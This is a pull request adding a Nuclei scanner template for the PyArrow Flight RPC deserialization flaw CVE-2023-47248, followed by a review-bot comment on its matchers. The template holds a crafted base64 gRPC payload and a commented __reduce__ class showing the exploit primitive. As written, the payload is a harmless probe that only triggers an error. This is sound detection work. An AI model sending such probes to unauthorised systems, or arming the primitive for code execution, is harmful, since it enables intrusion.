Create CVE-2023-47248.yaml #11401

68 changes: 68 additions & 0 deletions http/cves/2023/CVE-2023-47248.yaml
@@ -0,0 +1,68 @@
id: CVE-2023-47248

info:
name: PyArrow Flight RPC - Remote Code Execution
author: smolse
severity: critical
description: |
PyArrow Flight RPC from v0.14.0 through v14.0.0 allows remote attackers to execute arbitrary code via a maliciously crafted Python-defined extension type.
remediation: |
Upgrade to PyArrow v14.0.1 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-47248
- https://www.cve.org/CVERecord?id=CVE-2023-47248
- https://github.com/apache/arrow/commit/f14170976372436ec1d03a724d8d3f3925484ecf
- https://github.com/smolse/poc-or-gtfo/tree/main/CVE-2023-47248
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-47248
cwe-id: CWE-502
epss-score: 0.015960000
epss-percentile: 0.870280000
cpe: cpe:2.3:a:apache:pyarrow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: pyarrow
tags: cve,cve2023,rce,arrow,pyarrow,apache

http:
- raw:
- |
POST /arrow.flight.protocol.FlightService/DoPut HTTP/2
Host: {{Hostname}}
Content-Type: application/grpc
Te: trailers
Grpc-Accept-Encoding: identity, gzip, deflate

{{base64_decode("AAAAAS0KBAgBGgASpAIQAAAAAAAKAAwABgAFAAgACgAAAAABBAAMAAAACAAIAAAABAAIAAAABAAAAAEAAAAYAAAAAAASABgACAAGAAcADAAAABAAFAASAAAAAAABDxQAAADMAAAACAAAABAAAAAAAAAAAAAAAAAAAAACAAAAVAAAAAQAAAC8////CAAAACAAAAAUAAAAQVJST1c6ZXh0ZW5zaW9uOm5hbWUAAAAAFwAAAGFycm93LnB5X2V4dGVuc2lvbl90eXBlAAgADAAEAAgACAAAAAgAAAAkAAAAGAAAAEFSUk9XOmV4dGVuc2lvbjptZXRhZGF0YQAAAAAmAAAAgASVGwAAAAAAAACMCGJ1aWx0aW5zlIwHY29tcGxleJSTlClSlC4AAAQABAAEAAAA")}}

# The Base64 encoded payload in the request body is a serialized gRPC request to the "DoPut" method of the Arrow
# Flight RPC service. It contains a custom PyArrow extension type that, when deserialized, returns a complex number
# type object that expectedly doesn't have a "storage_type" attribute required by PyArrow and hence results in an
# exception being raised.
#
# Example malicious extension type class used in the request above:
# ```
# class MyType(pyarrow.PyExtensionType):
# def __init__(self):
# pyarrow.PyExtensionType.__init__(self, pa.binary(0))
#
# def __reduce__(self):
# return complex, ()
# ```
#
# By checking the response for the following error message in the "Grpc-Message" header, we can determine if the
# service is vulnerable to a remote code execution attack.
matchers-condition: and
matchers:
- type: word
words:
- "'complex' object has no attribute 'storage_type'"
part: header

- type: status
status:
- 200
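Review bot: the `status: 200` matcher under `matchers-condition: and` adds no discrimination for a gRPC endpoint, because a gRPC server answers with HTTP 200 whether the call succeeds or fails and reports the outcome in `grpc-status`/`grpc-message`; the word matcher on `'complex' object has no attribute 'storage_type'` is the real signal, so either drop the status matcher or state in the comment block why it is kept. Worth confirming as well that `part: header` captures the `Grpc-Message` value when the server sends it in HTTP/2 trailers rather than in the initial HEADERS frame, since the comment says the check relies on that header. Minor: the example class in the comment mixes `pyarrow.PyExtensionType` with `pa.binary(0)`; use one alias consistently, e.g. `import pyarrow as pa` with `pa.PyExtensionType.__init__(self, pa.binary(0))`.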